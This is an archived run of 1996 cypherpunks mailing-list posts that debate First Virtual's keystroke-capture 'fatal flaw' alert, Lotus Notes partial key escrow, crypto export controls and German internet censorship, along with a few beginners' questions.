Try helping 100 random people with computers.  Bet you 90 of them have
trouble getting onto the Internet, period, let alone figuring how to
run Netscape.  There is a reason why AOL/CompuServe do very well
caterring to those who are technically-challenged.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 30 Jan 1996 11:31:21 +0800
To: nsb@nsb.fv.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <ad32cd9601021004af4e@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations to FirstVirtual for having taken key-capture techniqures
that everyone has known about forever, and skillfully propagandizing it as
a 'fatal flaw in software encryption' playing on the technophobia of the
masses, who are afraid of computers already ("INFORMATION IS INSECURE THE
MOMENT YOU TOUCH A KEY". snork), to engeder widespread fear in encryption
("ENCRYPTING CREDIT CARDS ON THE DESKTOP IS NOT ONE OF THE SAFE
MECHANISMS"), thereby (hopefully) enhancing market share of FV, which
doesn't use encryption.

1) I remember Mr. Borenstein saying a year or two ago, something like "We
have nothing against encryption; we're just using a non-encrypting
technique for the moment, becuase it can be quickly, easily, and safely
deployed by us. Eventually,  we'll probably use encryption."    Apparently,
this propaganda piece marks a change of strategy.

2)  This is the first net distributed "security alert" distributed that
I've noticed, with almost no real content.  No one who knows a bit about
computer security learned anything they didn't already know from that
"alert".  Rather, it was distributed in the _form_ of a CERT-like alert,
but with the purpose and effect that is almost solely marketting of FV.
I'm sure we can expect many more now that FV has pioneered the
propaganda-as-alert technique--people are really scared about virus and
security risks, since they know nothing about them, and will pay a lot of
attention to them (witness "Good Times")--much more attention then they'd
normally pay an advertisement.  This masquerading advertisement is akin to
the advertisements masquerading as editorial content that you see in many
magazines not respectable enough to prohibit such things.

3)  I believe that FV works by assigning the user some sort of id number.
They send the id accross the net, FV has a database with "FV-ID" <->
credit-card-number correspondences, the merchant sends FV the id, FV bills
your card and pays the merchant.  Now, if I'm correct about how FV works,
we could clearly write a program that searches your HD for FVs data files,
extracts your FV-ID from it, and steals it.  It could be a virus, it could
send the FV accross the net, whatever.  We could then use your FV-ID to
make fraudulently make purchases through the FV system that would be billed
to you.  This is essentially the same attack as FV "demonstrates" against
software encrypted credit cards over the net: that is, the "You have an
insecure system and if we can put evil software on it, we can get you."
attack.

True, we wouldn't have your credit card number, and we couldn't order stuff
from LL Bean billed to you.  We could just order stuff from FV merchants.
So maybe it's marginally better.  Maybe.  But I can't see any way FV could
be immune to an attack of this sort.  I believe that all they do is give
you a first virtual ID number sent accross the net (in the clear!) in lieu
of your card number.      With an insecure PC as an assuption (and it is
probably a good one, actually), I can't see how FV could be immune from an
attack of this sort.   If Mr. Borenstein or anyone else thinks it is,
please explain how.

Sigh.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Mon, 29 Jan 1996 20:23:30 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: The Big Lie
In-Reply-To: <a3ZFiD78w165w@bwalk.dm.com>
Message-ID: <199601291158.TAA00437@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <a3ZFiD78w165w@bwalk.dm.com>, 
  Dr. Dimitri Vulis wrote:
> Zero crypto relevance...
> 
> mpd@netcom.com (Mike Duvos) writes:
> > It is interesting to note that there is no specific law
> > prohibiting free speech for Holocaust Agnostics in Germany. The
> > actual laws under which such cases are prosecuted are libel laws,
> > which have been liberally interpreted to mean that one may not
> > "libel" deceased Jews as a class or their memory in the minds of
> > their surviving relatives.
> >
> > The notion of libeling a class of deceased persons strikes me as
> > a dangerous and particularly convoluted legal fiction. (Although
> > I certainly don't mean any disrespect for the deceased or their
> > survivors when I say this.)
> 
> To me this sounds like a very twisted legal reasoning. If I understood
> correctly some other posts in this thread, by saying something like, "the Naz
> is
> invaded Denmark for reasons other than to round up and kill the 3,000 Danish
> Jews", this Zendel loser automatically implies that whoever says otherwise is
> lying; and that is a libel/slander, and is a criminal (not just civil) offens
> e.

I was under the impression that you couldn't libel/slander a dead
person. Mainly because libel/slander is a offence against reputation
which dead people don't care much for, but also because once you go
against this principle where in hell (no pun intended) do you draw the
line.

Of course my impressions tend to be based around the legal system I've
lived in all my life...

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Mon, 29 Jan 1996 20:24:09 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: more RANTING about NSA-friendly cpunks
In-Reply-To: <199601282104.NAA10926@netcom3.netcom.com>
Message-ID: <199601291158.TAA00448@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <199601282104.NAA10926@netcom3.netcom.com>, 
  "Vladimir Z. Nuri" wrote:
> 
> >In message <199601262011.MAA17408@netcom16.netcom.com>, 
> >  "Vladimir Z. Nuri" wrote:
> >> 
> >> has anyone *tried* just ignoring the ITAR wrt crypto and seeing what 
> >> would happen? the gubbermint blindly thinks that cyberspace will 
> >> inevitably bring the wrath of four horsemen of the infocalypse, but aren't
{snip}
> >
> >Zimmerman.
>
{snip}
> Zimmermann supports my contention, as I wrote in the post. NOTHING
> happened to him. it is conceivable this same result could have
> been arrived at (government drops investigation) if he never even 
> hired a lawyer.
> 
> Zimmermann is a perfect example of what may be counterproductive
> hysteria on *our* side, toward advancing crypto. if Zimmermann
> cannot be prosecuted, and is not prosecuted, where are the ITAR "teeth"???
> 

Nod. You may have a point there...

I'll tell you what, seeing as I *can't* export cryptostuff against
ITAR, what say *you* do it. Lots of it. And if nothing happens to you,
well and good.

OTOH the cause needs a few martyrs.
--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 31 Jan 1996 00:59:01 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <ad32da26030210049143@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:29 PM 01/29/96, zinc wrote:
[...]
>the point is not that this can be done, the point is that users need
>tools that would check for programs like this running on their
>system.  is fv making a 'fix' available?  i would imagine a  'fix'
>would be a program that would look for tsr type programs (or inits on
>a mac) that do this sort of thing.

At first I was going to say there was no way to do this--a program can't be
written to look at an arbitrary program as intput and determine if it does
a certain semantic action (steals your key strokes).    And I think this is
true.
However, on the MacOS at least, I believe that a key-capturing program
would have probably have to patch a particular point (or one of a set of
particular points) in the OS, and a program could probbably look at the OS
in RAM (or wherever patches happen; in RAM I think) and make sure it hasn't
been patched--it's the way MacOS 7.5.X looks straight out of the
shrinkwrap, nothings been done to it.  Or report that, indeed, that portion
of the OS has been patched, and some program might be logging your keys.
[Of course, some legitimate programs might patch these portions of the OS
too--so you'd have to be careful not to have a hacked version of those
legitimate programs that also captured your keys.  zinc's next point is
relevant here, of course.]

Can anyone tell me for sure if this would indeed be feasible?

>this is the sort of thing that crypto can help with.  there should be
>a site that PGP signs the programs available from their site.  these
>signed programs will have been testing on the appropriate system and
>verified to be free of small malicious programs such as the one you
>describe.  alternatively, the author themselves could PGP sign the app
>(this is already done) and this would be what users should d/l.

True.  But, remember, you've still got to trust the _author_ of the
program. Commercial programs generally dont' have source available, so I'm
basically trusting Steve Dorner not to have Eudora send a copy of all my
messages to the NSA.  Even if the sources were available, most people
aren't going to want to (or be capable of) going through the source, so
they're trusting other third parties who have said "yep, I looked at the
source, and it's okay."  And, while there are plenty of third party types
to look at a program like PGP (although, actually, I can't identify any
reliable third party crypto type, not on the PGP developement team, who I
know has looked at the PGP source and pronounced it okay. Doesn't mean it
hasn't happened, but it means realistically, users _don't_ rely on third
party guarantees of security in the source. Or at least I don't, but how
many of you out there know a reliable third party source that has given a
seal of approval to PGP, and specifically rely on that knowledge to give
you confidence in using PGP?)... umm, while there are plenty of third party
types to look at PGP, there are surely millions of lines of commercial
software produced every year,  and I'm not sure where all these reliable
third party types to look at the code are going to come from.  In theory,
having source available is good.  In practice, you still end up trusting
the designer not to do anything bad to you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman/Iris.IRIS@iris.com
Date: Wed, 31 Jan 1996 12:03:53 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <9601300458.AA2251@moe.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been on the road since the RSA conference where the Notes crypto hack was 
announced. Sorry to have missed the fun. To answer at least some of the 
speculation on "how does it work", attached is a "Lotus Backgrounder" document 
that was distributed at the RSA conference. Some of the speculation in this 
group has had uncanny accuracy.

I'd also like to defend the Notes R4 approach. I hate export controls more than 
most people, in part because I waste a lot of my time trying to figure out how 
best to deal with them. While I think Notes is doing the right thing given the 
current constraints, I can't help but be appalled by the current constraints.

I don't believe 40-bit crypto is a joke. Even if it costs NSA $.25 to break a 
40-bit RC4 key, and I'd speculate it costs them more than that, it means they 
can't afford to do keyword searches on every encrypted message they can afford 
to intercept (or at least they couldn't if everyone took the trouble to 
encrypt). And with a separate 40 bit key on each of your mail messages, an 
attacker may be able to break a few if he knows they are the good ones, but 
it's painful to browse. That said, I would not expect anyone to get much 
comfort from 40 bit crypto.

The Notes R4 approach gives the best of two fairly unpleasant worlds. You can 
export crypto if you either limit yourself to 40 bits (which means anyone can 
see it if they want it badly enough) or give the government the keys (through 
escrow - which means the government and anyone else who can "break" the escrow 
mechanism can see your stuff with no work at all). Notes R4 gives the 
government part of the key, so they still have some work to do and other 
attackers have a lot of work to do. This is not a good solution. It's not even 
an acceptable solution. But it is a better solution than 40 bit crypto. And 
it's enough better that I think it was worth the hassle it took to get it.

Notes R4 didn't give up anything to get this. It is expensive to have the 
technical complexity of two different interoperable versions of the product, 
and we could have said... gee, this is really good enough for everybody... why 
don't we just sell the "International Edition" everywhere? We didn't. The 
"North American Edition" (euphemistically named to reflect that it's also legal 
in Canada) still uses real strong crypto.

The only valid criticism I've heard of the approach is by making the best of a 
bad situation, we've reduced the incentive for fundamental reform. That may be 
true, but once an approach is known (and we aren't the only ones to have 
thought of it - Adi Shamir's Partial Key Escrow proposal has similar 
properties), declining to use it does not fuel the pleas for legislative 
relief. In fact, it supports the argument that people don't even implement the 
strongest crypto they are allowed... why should they be allowed more? I think 
it is incumbent on all of us to do the best we can, for the brave to break the 
law and risk going to jail, for the wimpy to squeeze every last bit out of the 
allowed options, and for everyone to mouth off in risk-free forums like this one




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 31 Jan 1996 00:33:28 +0800
To: cypherpunks@toad.com
Subject: Need testing help
Message-ID: <9601300127.AA16076@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I need some help testing my rewrite of mixmaster.

It is four separate programs (keygen, user-agent, queue process, daemon
reception) writting in portable ANSI C (gcc -Wxxxx is silent).  It
does not include RSAREF, but has a sane makefile for it if you need.
It uses autoconf.  It has some bugs.

If you're in the US, drop me a line.

Is decrypt-only software okay to export?  If so, then I have an
export version, too.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 30 Jan 1996 14:49:18 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <1mwHiD103w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960129203729.7421E-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 29 Jan 1996, Dr. Dimitri Vulis wrote:

> Isn't there something in U.S. Code about crossing state lines
> for immoral purposes?

No relevance here.  Originally enacted to combat the "white 
slavery" trade, it was probably used more to prosecute unmarried
lovers for sexual activity outside of marriage.  I don't even
know if it's still on the books, but as I said, no relevance in
the current debate.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 31 Jan 1996 09:14:36 +0800
To: cypherpunks@toad.com
Subject: More FUD from the Luddites at FV [pt. 2]
Message-ID: <v02130502ad33448ac18b@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



People have been dealing with viruses and malicious programs
since the dawn of PCs. (Before that even, really.) This is not
news. A virus or trojan horse can do something much worse than
the (possible) inconvenience of a "bad guy" getting your credit
card number.

Whether you're a business or an individual, having, say, your
hard drive wiped clean by a virus would be several orders of
magnitude worse than the relatively minor inconvenience of
having to get unauthorized items deleted from your credit card bill.
This is just as possible as the credit card scenario FV is
painting, and PC owners have been dealing with this kind of
threat for over a decade.

Rather than focus on something as tame as credit card numbers,
let's look at what else a malicious program could do if it had
unlimited power over your PC:

  o Ransack your tax preparation files
  o Compress and transmit your financial information to your
    competitors or to Blacknet.
  o Capture the passwords and logins that you use while telecommuting
  o Use your dial-up bank-by-computer software to make unauthorized
    transfers.
  o Reformat your hard drive.

The fact is, malicious programs are a threat that has been in the
background for over a decade, and PC users with any experience to
speak of are familiar with at least the rudiments of dealing with
this class of problem. If anything, they're more familiar with this
kind of threat than more network-specific threats. (Look at the huge
sales of popular anti-virus products.)

Sure, there are clueless people out there, but the solution is to help
make them less clueless, not to stampede them in a panic, which is
apparently FV's goal here.

--doug

Ernest Hua writes:
>I'm quite amazed at the level of ... well ... how can I characterize it
>without insulting too many people? ... arrogance? ...
>
>Many of you would be amazed at what motivates the average person to buy
>or to use a computer.  Most people, when asked about security, do not
>even have a concept, let alone how it applies in a computer environment.
>
>There is far more misinformation and miseducation among the average user
>than you might think.  Not everyone understands why they need a modem in
>order to get onto the Internet.  Not everyone understands why you need
>to sign up for an account with an ISV in order to get onto the Internet.
>(You would be amazed at how many people think that just buying a modem
>is good enough to get onto the Internet.)
>
>The response is typically, "I don't understand all that technobabble!"
>"Just give me something that works!"  "This is too complicated!"
>
>If you think that the dumb user should be left to fight for his/her own
>survival on the information highway, you are easily condemning 75% to
>90% of the current users.
>
>I am not entirely convinced that Borenstein is totally selfless in his
>(or FV's) announcement.  However, the basis of his argument, while it
>may not apply to the cypherpunk community, has much merit in the real
>world.
>
>Try helping 100 random people with computers.  Bet you 90 of them have
>trouble getting onto the Internet, period, let alone figuring how to
>run Netscape.  There is a reason why AOL/CompuServe do very well
>caterring to those who are technically-challenged.
>
>Ern

------                                                             ------
Douglas Barnes         "The tighter you close your fist, Governor Tarkin,
cman@communities.com    the more systems will slip through your fingers."
cman@best.com                                             --Princess Leia






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 31 Jan 1996 09:09:48 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: [NOISE] Re: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <1mwHiD103w165w@bwalk.dm.com>
Message-ID: <Pine.ULT.3.91.960129210801.6235c-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Dr. Dimitri Vulis wrote:

> m5@dev.tivoli.com (Mike McNally) writes:
> > Thomas Roessler writes:
> >  >                      ... In particular, they are right now
> >  > *checking* whether providing internet access is a criminal
> >  > offence due to the possibility to gain access to `inciting
> >  > material' (the German word is `Volksverhetzung') via the Net.
> >
> > If so, then this humble non-lawyer would suggest to the prosecutors
> > that they go after travel agencies next, because they sell airline
> > tickets that could be used to travel to countries where offensive
> > material is available.
> 
> Isn't there something in U.S. Code about crossing state lines
> for immoral purposes?

Yeah -- the intent was to stop the undesirables from kidnapping the pure 
white wimmin. Hasn't been used for years, if not decades.
 
> (While I'm thoroughly disgusted by the German government's censorship,
> let's not forget that the U.S. is no paradigm of freedom either.)

It's about as close as you can get, though.

The US is the battleground because it has the power to impose its will on 
the rest of the world. Crypto controls in the US effectively mean crypto 
controls on common software worldwide.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@hooked.net>
Date: Wed, 31 Jan 1996 08:58:46 +0800
To: "cypherpunks@toad.com>
Subject: RE: Cyphercoding Training Wheels??
Message-ID: <01BAEE8F.D6BF3860@chum-55.ppp.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain




Greetings All,

I have been lurking as a newbie on the cypherpunks mailing list for 'bout one month.  Have ordered Koblitz book on Number Theory and Applied Cryptography.  As I slowly (and probably painfully) learn some number theory, I would like to start coding, particularly as it would related to encrypting and decrypting stuff.  I ask the community's input as to whether I should use visual basic or visual C++ ??? I am using a windoze95 platform.

Any comments would be welcome.. thanks

Michael E. Carboy
carboy@hooked.net
finger for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 30 Jan 1996 15:00:20 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: Need testing help
In-Reply-To: <9601300127.AA16076@sulphur.osf.org>
Message-ID: <199601300526.VAA13783@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Is decrypt-only software okay to export?  If so, then I have an
> export version, too.

	Apparently RSA is trying to determine that question. (An RSA
employee mentioned that to me at the Bernstein hearing.)

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 30 Jan 1996 13:25:05 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <9601292106.AA15042@alpha>
Message-ID: <1mwHiD103w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:
> Thomas Roessler writes:
>  >                      ... In particular, they are right now
>  > *checking* whether providing internet access is a criminal
>  > offence due to the possibility to gain access to `inciting
>  > material' (the German word is `Volksverhetzung') via the Net.
>
> If so, then this humble non-lawyer would suggest to the prosecutors
> that they go after travel agencies next, because they sell airline
> tickets that could be used to travel to countries where offensive
> material is available.

Isn't there something in U.S. Code about crossing state lines
for immoral purposes?

(While I'm thoroughly disgusted by the German government's censorship,
let's not forget that the U.S. is no paradigm of freedom either.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 31 Jan 1996 11:51:15 +0800
To: llurch@networking.stanford.edu>
Subject: Re: [NOISE] Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <Pine.ULT.3.91.960129130750.6235N-100000@Networking.Stanford.EDU>
Message-ID: <0l3MAC200bkp0gQAg0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 29-Jan-96 [NOISE] Re: "German
service.. by Rich Graves@networking.s 
> There was a lively debate in feminist/legal circles a while back about
> introducing "the reasonable woman standard," "the reasonable gay man
> standard," etc. into the legal currency. The movement intended to make
> "date rape" and sexual harassment easier to prosecute. I didn't keep up
> with it, but I'm sure the relevant papers are still being cited. I doubt 
> and hope that no court ever took the argument seriously.

I vaguely remember one district court upholding the "reasonable woman"
standard around four years ago, but that braindead idea was abandonded
in subsequent decisions.

For more info on what happens when the "reasonable woman" standard is
applied in higher education (particularly regarding online speech),
check out:
     http://joc.mit.edu/

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Tue, 30 Jan 1996 13:45:13 +0800
To: bplib@wat.hookup.net (Tim Philp)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <Pine.OSF.3.91.960129221928.14389B-100000@nic.wat.hookup.net>
Message-ID: <199601300335.WAA20456@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> > >There are many ways to spread it besides a virus.  Zillions of 'em.  And
> > 
> > There are zillions (what, more than one thousand?) ways to get someone
> > to run a random piece of software that will capture their keystrokes?
> 
> Not wishing to get in the middle of this controversy, I have been 
> wondering about the possibility of using a JAVA applet to do keyboard 
> sniffing. As I am not familiar with this language, does anyone know if 
> this would be possible?

>From what I've read about Java, it is not possible to use Java in this
way.  But keep in mind that while I've got this neat-o book on Java at my
elbow, I'm not independently wealthy nor am I a college student with lots
of time on his hands, so I haven't gotten very far into the book.  But
from what I've read and heard, it's not possible to compromise the
integrity of the interpreter - unless, of course, you buy into the
conspiracy crap that FV is trying to sell, and an Evil Computer Genius has
managed to replace your Java interpreter with one of his own design, which
he then uses to subvert your entire operating system and machine, etc.
<insert sound of manicial laughter here> ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Tue, 30 Jan 1996 13:08:00 +0800
To: cjs@netcom.com (cjs)
Subject: Re: CONTEST:  Name That Program! (no-brainer)
Message-ID: <v01520c04ad332e13000a@[199.227.1.134]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:29 PM 1/29/96, cjs wrote:
>> As you may have read in my previous message, First Virtual has developed
>> and demonstrated a program that completely undermines all known schemes
>> for using software-encrypted credit cards on the Internet.  More details
>> are avialable at http://www.fv.com/ccdanger.
>>
>> That was the easy part.
>
>***ROFL***
>
>This "pre-encryption" program is not a virus. It attaches to the
>keyboard driver and captures keystrokes from the keyboard as they are
>typed -- BEFORE they can be encrypted by the application encryption
>software. First Virtual scientists note that credit a check-digit. A
>greater danger is that passwords are also as easily captured.
>
>***ROFL***

Umm - that is not news, it's an old hacker trick originally used for
scamming login/passwd pairs.

I've seen this done as either a patch to the telcom program used in a
public lab on campus (this was actually quite clever - it'd wait till you
completed your login and then email the cracker your login/passwd while
simultaneously keeping the information from appearing on screen.  It even
kept his email address encrypted so I had to use a debugger to find it) or
as a TSR or Macintosh extension.

2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: br@scndprsn.Eng.Sun.COM (Benjamin Renaud)
Date: Tue, 30 Jan 1996 15:26:45 +0800
To: joseph@genome.wi.mit.edu
Subject: Re: FL Demonstrates Fatal Flaw in Logins
Message-ID: <199601300603.WAA11063@springbank.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



A couple of posts have raised the issue of doing the FV keyboard-capture
attack using Java.

|However, I don't know much about Java, would it be possible to make such an
|applet with Java?

The only events a Java applet is privy to are those that are typed in
an applet window (and only those it itself spawned). So if a user types
their credit card number in an applet window, the applet could send the
information back to its server (and to that server only). 

In theory, it is possible to make an applet which appears to be selling
something, get people to visit the page it's on, convince these people
to enter their credit card numbers, and send those back to the server
of origin. Of course, once this happens, you always know what host the
applet came from (unless the thief, in order to get a few credit card
numbers, has hacked DNS so that it's harder to track it).

That's the extent of the risk.

-- Benjamin Renaud
   Java Products Group




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Tue, 30 Jan 1996 14:28:29 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601292111.AA23738@toad.com>
Message-ID: <199601300406.WAA00247@abernathy.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


My mailer insists that Nathaniel Borenstein wrote:

[ An impressive amount of tripe ]

Nathaniel, go away.  You botha us.

Any useful information in your anouncement is already well-known.   
The rest of it is alarmist and self-serving.  There have been  
several excellent posts pointing out the flaws in your arguments.

BTW, I took a look at the FV web page.  While checking out the  
information section I had a bad flashback to one of those late night  
infomercials on "buying and selling."  Looks cut from the same  
mold.  Truly sad.

Until I actually see an advisory from CERT, I'll just have to  
assume they told FV to go take a flying leap.  I certainly hope they  
have enough integrity to ignore this.

Hmm..  Did I just hear the sound of Nathaniel Borenstein and  
*@*.fv.com being added to ZILLIONS :-) of killfiles and filter  
lists?

KLUNK

I thought I did.

---
Paul M. Cardon -- I speak for myself . 'nuff said.

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jan 1996 08:59:21 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <v02120d03ad336095e09d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:25 1/29/96, Charlie_Kaufman/Iris.IRIS@iris.com wrote:

>The Notes R4 approach gives the best of two fairly unpleasant worlds. You can
>export crypto if you either limit yourself to 40 bits
[...]
>
>Notes R4 didn't give up anything to get this.

Of course Lotus gave something up for it. The voluntarily made sure that
even the supposedly non-GAK domestic version provides relatively easy
access for the authorities. Sixty-four bits are an inconvenience, but
nothing more. If Lotus had wanted to make the domestic version GAK free,
they would have used 128 bit. In the end Lotus caved in twice: they
released a 'super easy' GAK international version and a not 'quite so easy'
GAK domestic version. Sixty-four bits is GAK. Period.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@hooked.net>
Date: Tue, 30 Jan 1996 15:50:05 +0800
To: "cypherpunks@toad.com>
Subject: PGP Shell Integrity
Message-ID: <01BAEE97.0C96ED00@chum-55.ppp.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain



Greetings All,

Firstly, if this is viewed as "Noise" rather than "Signal", please accept my apologies.

The matter at hand concerns my concern over my inability to check the "integrity" of a PGP windoze shell written by Michael R. Lyman at Aegis Research Corp.

I worry that since the shell has access to my secret ring that it might be sending it somewhere without my knowledge.  The freeware was, according to Mr.Lyman, developed "Project Manager, Forward Air Missile Defense, United States Army Missile Command".  That gvt. affiliation gives me considerable pause as regards back doors and other ways my secret ring and pass phrase could be compromised.

Does anyone have any familiarity with this freeware?  I do not think I am being paranoid.. just careful.  Lastly, if I am not a programmer, what sort of inspection can I perform on the software to make sure it is not "bugged"?

Thanks for your thoughts.... and sorry to have disturbed those who see this post as noise

Kind regards,
Michael E. Carboy
carboy@hooked.net
finger for PGP pub key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 31 Jan 1996 16:55:46 +0800
To: Louis Freeh <cypherpunks@toad.com>
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <199601300412.XAA23037@opine.cs.umass.edu>
Message-ID: <Pine.ULT.3.91.960129221006.6235h-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Futplex wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Tim Philp writes:
> > I have been wondering about the possibility of using a JAVA applet to do 
> > keyboard sniffing. As I am not familiar with this language, does anyone 
> > know if this would be possible?
> 
> program. I don't see how you could build a keyboard sniffer in Java unless 
> you could somehow trick the interpreter into feeding an input stream to an
> additional process. 
> 
> Much more likely, IMHO, than a Java sniffer is a Java Trojan horse that pops 
> up an innocuous dialog box and asks you to enter some sensitive piece of
> information, then sends it off somewhere. About all it takes to write that is
> a modicum of skill in user interface design. You could write it in any 
> programming language, but in Java it may be particularly effective, since 
> people may come to expect to be prompted for sensitive info over the net by 
> Java apps.

Hmm. Actually, what do Java dialog prompts look like? Is there any
indication that they come from Java, or can they be made to look like any
dialog from any program, or the OS itself? I suppose this is
implementation-dependent. 

One "neat" trick would be an applet that sleeps for several minutes and 
then suddenly pops up asking for your system password, or something. 
A heck of a lot of people fell for something much more primitive at AOL.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Wed, 31 Jan 1996 09:11:50 +0800
To: cypherpunks@toad.com
Subject: My mail to Nathaniel (was Re: Re: FV Demonstrates Fatal Flaw inSoftware Encryption of Credit)
In-Reply-To: <22706.822974816.1@nsb.fv.com>
Message-ID: <199601300418.WAA00258@abernathy.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


My mailer insists that Nathaniel Borenstein wrote:
